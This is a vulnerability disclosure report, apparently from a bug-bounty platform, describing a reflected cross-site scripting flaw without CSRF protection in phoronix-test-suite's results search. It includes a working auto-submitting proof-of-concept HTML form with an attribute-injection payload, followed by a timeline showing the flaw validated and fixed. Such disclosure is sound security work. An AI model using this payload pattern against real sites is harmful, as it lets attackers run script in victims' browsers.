Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

Valid

Reported on

Feb 9th 2022


Description

Hi, i found a Reflected XSS vulnerability (POST based XSS + no CSRF token) in phoronix test suite, Results tab.

Proof of Concept

Install a local instance of phoronix
create a Search results form like this:
// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8222/?results" method="POST">
      <input type="hidden" name="time_start" value="2022&#45;02&#45;08&quot;onfocus&#61;&quot;confirm&#40;origin&#41;&quot;autofocus&#61;&quot;" />
      <input type="hidden" name="time_end" value="2022-02-09" />
      <input type="hidden" name="containing_tests" value="testt" />
      <input type="hidden" name="result_limit" value="100" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
//
and send to victim. Victim click on the link resulting reflected cross site scripting.

Impact

This vulnerability is capable of Reflected XSS

We are processing your report and will contact the phoronix-test-suite team within 24 hours. 4 months ago
Andy modified the report
4 months ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back 4 months ago
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability 4 months ago
Andy has been awarded the disclosure bounty
The fix bounty is now up for grabs
phoronix-test-suite/phoronix-test-suite maintainer confirmed that a fix has been merged on 1eac92 4 months ago
The fix bounty has been dropped
to join this conversation